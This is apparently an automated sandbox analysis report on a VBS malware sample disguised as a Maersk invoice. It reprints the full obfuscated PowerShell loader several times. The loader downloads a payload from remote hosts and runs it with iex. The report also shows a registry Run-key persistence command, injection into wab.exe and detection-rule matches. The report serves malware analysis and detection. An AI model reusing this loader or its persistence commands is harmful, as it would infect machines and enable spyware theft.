lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_05445C17 Sleep,NtProtectVirtualMemory,

10_2_05445C17

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B88C2B2	1_2_00007FFD9B88C2B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B88B506	1_2_00007FFD9B88B506
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0454F1F0	4_2_0454F1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0454FAC0	4_2_0454FAC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_0454EEA8	4_2_0454EEA8

Source: Maersk_BL_Invoice_Packinglist.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"

Source: amsi32_6540.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6540, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@17/10@4/3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Scabrosely.Tor

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3760:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: \Sessions\1\BaseNamedObjects\jmoughoe-DMPW3B
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sgmxergi.2iy.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Maersk_BL_Invoice_Packinglist.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4412
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6540

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Maersk_BL_Invoice_Packinglist.vbs	Virustotal: Detection: 12%
Source: Maersk_BL_Invoice_Packinglist.vbs	ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Maersk_BL_Invoice_Packinglist.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Salvings% -w 1 $Urbanities=(Get-ItemProperty -Path 'HKCU:\Pardo\').Krecar;%Salvings% ($Urbanities)"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
